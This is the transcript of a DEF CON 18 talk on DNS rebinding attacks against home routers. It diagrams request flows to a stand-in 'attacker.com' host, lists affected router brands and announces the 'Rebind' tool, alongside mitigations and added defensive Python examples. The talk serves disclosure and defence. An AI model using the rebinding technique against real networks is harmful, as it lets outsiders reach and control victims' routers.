defcon 18 heffner routers
TRANSCRIPT
-
8/9/2019 DEFCON 18 Heffner Routers
1/88
How to Hack Millions of Routers
Craig Heffner, Seismic LLC
-
SOHO Router Security?
-
Common Attack Techniques
Cross Site Request Forgery
No trust relationship between browser and router
Can't forge Basic Authentication credentials
Anti-CSRF
Limited by the same origin policy
DNS Rebinding
Rebinding prevention by OpenDNS / NoScript / DNSWall
Most rebinding attacks no longer work Most
-
Multiple A Record Attack
Better known as DNS load balancing / redundancy
Return multiple IP addresses in DNS response
Browser attempts to connect to each IP address in order
If one IP goes down, browser switches to the next IP in the list
Limited attack
Can rebind to any public IP address
Can't rebind to an RFC1918 IP address
-
Rebinding to a Public IP
Target IP: 2.3.5.8
Attacker IP: 1.4.1.4
Attacker Domain: attacker.com
[Diagram, animated over several slides: hosts 1.4.1.4 and 2.3.5.8. Captions in order of appearance:]
What is the IP address for attacker.com?
1.4.1.4, 2.3.5.8
GET / HTTP/1.1
Host: attacker.com
GET / HTTP/1.1
Host: attacker.com
TCP RST
GET / HTTP/1.1
Host: attacker.com
-
Rebinding to a Private IP
Target IP: 192.168.1.1
Attacker IP: 1.4.1.4
Attacker Domain: attacker.com
[Diagram, animated over several slides: hosts 1.4.1.4 and 192.168.1.1. Captions in order of appearance:]
What is the IP address for attacker.com?
1.4.1.4, 192.168.1.1
GET / HTTP/1.1
Host: attacker.com
-
Services Bound to All Interfaces
# netstat -l
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 *:80 *:* LISTEN
tcp 0 0 *:53 *:* LISTEN
tcp 0 0 *:22 *:* LISTEN
tcp 0 0 *:23 *:* LISTEN
-
Firewall Rules Based on Interface Names
-A INPUT -i eth0 -j DROP
-A INPUT -j ACCEPT
-
IP Stack Implementations
RFC 1122 defines two IP models:
Strong End System Model
Weak End System Model
-
The Weak End System Model
RFC 1122, Weak End System Model:
A host MAY silently discard an incoming datagram whose destination address does not correspond to the physical interface through which it is received.
A host MAY restrict itself to sending (non-source-routed) IP datagrams only through the physical interface that corresponds to the IP source address of the datagrams.
-
Weak End System Model
eth1: 192.168.1.1
eth0: 2.3.5.8
[Diagram, animated over several slides. Packets in order of appearance:]
TCP SYN Packet
Source IP: 192.168.1.100
Destination IP: 2.3.5.8
Destination Port: 80
TCP SYN/ACK Packet
Source IP: 2.3.5.8
Destination IP: 192.168.1.100
Source Port: 80
TCP ACK Packet
Source IP: 192.168.1.100
Destination IP: 2.3.5.8
Destination Port: 80
-
Traffic Capture
-
End Result
-
Public IP Rebinding Attack
Target IP: 2.3.5.8
Attacker IP: 1.4.1.4
Attacker Domain: attacker.com
[Diagram, animated over several slides: hosts 1.4.1.4 and 2.3.5.8. Captions in order of appearance:]
What is the IP address for attacker.com?
1.4.1.4, 2.3.5.8
GET / HTTP/1.1
Host: attacker.com
...
GET / HTTP/1.1
Host: attacker.com
TCP RST
GET / HTTP/1.1
Host: attacker.com
-
Public IP Rebinding Attack
Pros:
Nearly instant rebind, no delay or waiting period
Don't need to know router's internal IP
Works in all major browsers: IE, FF, Opera, Safari, Chrome
Cons:
Router must meet very specific conditions
Must bind Web server to the WAN interface
Firewall rules must be based on interface names, not IP addresses
Must implement the weak end system model
Not all routers are vulnerable
-
Affected Routers
Asus
Belkin
Dell
Thompson
Linksys
Third Party Firmware
ActionTec
-
Making the Attack Practical
To make the attack practical:
Must obtain target's public IP address automatically
Must coordinate services (DNS, Web, Firewall)
Must do something useful
-
Tool Release: Rebind
Provides all necessary services
DNS, Web, Firewall
Serves up JavaScript code
Limits foreground activity
Makes use of cross-domain XHR, if supported
Supports all major Web browsers
Attacker can browse target routers in real-time
Via a standard HTTP proxy
-
Rebind
Target IP: 2.3.5.8
Rebind IP: 1.4.1.4
Attacker Domain: attacker.com
[Diagram, animated over several slides: hosts 2.3.5.8 and 1.4.1.4. Captions in order of appearance:]
What is the IP address for attacker.com?
1.4.1.4
GET /init HTTP/1.1
Host: attacker.com
Location: http://wacme.attacker.com/exec
What is the IP address for wacme.attacker.com?
1.4.1.4, 2.3.5.8
GET /exec HTTP/1.1
Host: wacme.attacker.com
GET / HTTP/1.1
Host: wacme.attacker.com
TCP RST
GET / HTTP/1.1
Host: wacme.attacker.com
GET /poll HTTP/1.1
Host: attacker.com:81
GET http://2.3.5.8/ HTTP/1.1
GET /poll HTTP/1.1
Host: attacker.com:81
GET / HTTP/1.1
GET / HTTP/1.1
Host: wacme.attacker.com
POST /exec HTTP/1.1
Host: attacker.com:81
-
Demo
-
More Fun With Rebind
Attacking SOAP services
UPnP
HNAP
We can rebind to any public IP
Proxy attacks to other Web sites via your browser
As long as the site doesn't check the host header
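The Host header check named in the last line also works as a defence on the router side: a rebound request arrives carrying the attacker's domain in `Host`, so an admin interface that only answers to its own names rejects it. The following is an added example, not code from the deck or from any router firmware; `ALLOWED_HOSTS`, `router.lan` and the handler are assumptions.

```python
from http.server import BaseHTTPRequestHandler

# Assumed names under which this admin interface is legitimately reached.
ALLOWED_HOSTS = {"192.168.1.1", "router.lan"}

def normalise_host(header):
    """Return the host part of a Host header, lower-cased, or None if malformed."""
    if not header:
        return None
    host = header.strip().lower()
    if host.startswith("["):                  # IPv6 literal: [addr]:port
        end = host.find("]")
        if end == -1:
            return None
        rest = host[end + 1:]
        host = host[1:end]
    else:
        host, sep, rest = host.partition(":")
        rest = sep + rest
    if rest and not (rest.startswith(":") and rest[1:].isdigit()):
        return None                           # junk after the host part
    host = host.rstrip(".")                   # "router.lan." equals "router.lan"
    return host or None

def host_allowed(header, allowed=ALLOWED_HOSTS):
    """True only if the request names this device, not an arbitrary domain."""
    return normalise_host(header) in allowed

class AdminHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        hosts = self.headers.get_all("Host") or []
        # Exactly one Host header, and it must be one of our own names.
        if len(hosts) != 1 or not host_allowed(hosts[0]):
            self.send_error(403, "Unrecognised Host header")
            return
        body = b"admin page\n"
        self.send_response(200)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)
```
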
-
DNS Rebinding Countermeasures
-
Am I Vulnerable?
-
End-User Mitigations
Break any of the attack's conditions
Interface binding
Firewall rules
Routing rules
Disable the HTTP administrative interface
Reduce the impact of the attack
Basic security precautions
-
Blocking Attacks at the Router
Don't bind services to the external interface
May not have sufficient access to the router to change this
Some services don't give you a choice
Re-configure firewall rules
-A INPUT -i eth1 -d 172.69.0.0/16 -j DROP
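How interface-name rules and a destination-address rule treat a LAN packet addressed to the WAN IP, as an added example that is not part of the original deck. It evaluates only the `-A`/`-i`/`-s`/`-d`/`-j` subset of iptables syntax; the rule sets and helper names are constructed, using the addresses from the diagrams (eth0 = WAN 2.3.5.8, eth1 = LAN).

```python
import ipaddress
import shlex

KEYS = {"-A": "chain", "-i": "iface", "-s": "src", "-d": "dst", "-j": "target"}

def parse_rule(line):
    """Parse one rule written with the option subset used on the slides."""
    tok = shlex.split(line)
    if len(tok) % 2:
        raise ValueError(f"option without a value in {line!r}")
    rule = dict.fromkeys(KEYS.values())
    for flag, value in zip(tok[::2], tok[1::2]):
        if flag not in KEYS:
            raise ValueError(f"unsupported option {flag!r}")
        rule[KEYS[flag]] = value
    return rule

def verdict(rules, in_iface, src, dst, policy="ACCEPT"):
    """First-match evaluation of the INPUT chain for a single packet."""
    for line in rules:
        r = parse_rule(line)
        if r["chain"] != "INPUT":
            continue
        if r["iface"] and r["iface"] != in_iface:
            continue
        if r["src"] and ipaddress.ip_address(src) not in ipaddress.ip_network(r["src"]):
            continue
        if r["dst"] and ipaddress.ip_address(dst) not in ipaddress.ip_network(r["dst"]):
            continue
        return r["target"]
    return policy

# Constructed rule sets: the interface-name rules, then the same rules with a
# destination-based DROP on the LAN interface placed in front of them.
WEAK = ["-A INPUT -i eth0 -j DROP", "-A INPUT -j ACCEPT"]
FIXED = ["-A INPUT -i eth1 -d 2.3.5.8 -j DROP"] + WEAK

def lan_reaches_wan_ip(rules):
    """True if a LAN client (via eth1) is accepted when it addresses the WAN IP."""
    return verdict(rules, "eth1", "192.168.1.100", "2.3.5.8") == "ACCEPT"

if __name__ == "__main__":
    for name, rules in (("interface-name rules", WEAK), ("with destination rule", FIXED)):
        print(name, "->", "reachable" if lan_reaches_wan_ip(rules) else "blocked")
```

With the interface-name rules the packet never matches `-i eth0` and falls through to ACCEPT; the destination rule drops it while LAN access to 192.168.1.1 is unaffected.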
-
HTTP Administrative Interface
Disable the HTTP interface
Use HTTPS / SSH
Disable UPnP while you're at it
But be warned
Enabling HTTPS won't disable HTTP
In some routers you can't disable HTTP
Some routers have HTTP listening on alternate ports
In some routers you can't disable HNAP
-
Blocking Attacks at the Host
Re-configure firewall rules
-A INPUT -d 172.69.0.0/16 -j DROP
Configure dummy routes
route add -net 172.69.0.0/16 gw 127.0.0.1
-
Basic Security Precautions
Change your router's default password
Keep your firmware up to date
Don't trust un-trusted content
-
Vendor / Industry Solutions
Fix the same-origin policy in browsers
Implement the strong end system model in routers
Build DNS rebinding mitigations into routers
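One way a router's resolver could implement such a mitigation, as an added example (not code from the deck or from any of the tools it names). A filter that strips only private addresses lets the public-IP answer from the diagrams through, so this one also strips the router's own WAN address; `wan_ip`, `local_suffixes` and the function name are assumptions.

```python
import ipaddress

def rebinding_suspects(qname, answers, wan_ip=None, local_suffixes=("lan",)):
    """Return the A/AAAA answers a router's resolver should strip for qname."""
    name = qname.rstrip(".").lower()
    if any(name == s or name.endswith("." + s) for s in local_suffixes):
        return []                       # local-zone names may point at local hosts
    own = ipaddress.ip_address(wan_ip) if wan_ip else None
    stripped = []
    for text in answers:
        ip = ipaddress.ip_address(text)
        if ip.version == 6 and ip.ipv4_mapped:
            ip = ip.ipv4_mapped         # ::ffff:192.168.1.1 is still 192.168.1.1
        if ip.is_private or ip.is_loopback or ip.is_link_local or ip == own:
            stripped.append(text)
    return stripped

if __name__ == "__main__":
    # Constructed responses using the addresses from the diagrams.
    print(rebinding_suspects("attacker.com", ["1.4.1.4", "192.168.1.1"]))
    print(rebinding_suspects("wacme.attacker.com", ["1.4.1.4", "2.3.5.8"]))
    print(rebinding_suspects("wacme.attacker.com", ["1.4.1.4", "2.3.5.8"],
                             wan_ip="2.3.5.8"))
```
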
-
Conclusion
DNS rebinding still poses a threat to your LAN
Tools are available to exploit DNS rebinding
Only you can prevent forest fires
Q & A
-
Q & A
Rebind project
http://rebind.googlecode.com
Contact
-
References
Same Origin Policy
http://en.wikipedia.org/wiki/Same_origin_policy
RFC 1122
http://www.faqs.org/rfcs/rfc1122.html
Loopback and Multi-Homed Routing Flaw
http://seclists.org/bugtraq/2001/Mar/42
TCP/IP Illustrated Volume 2, W. Richard Stevens
p. 218-219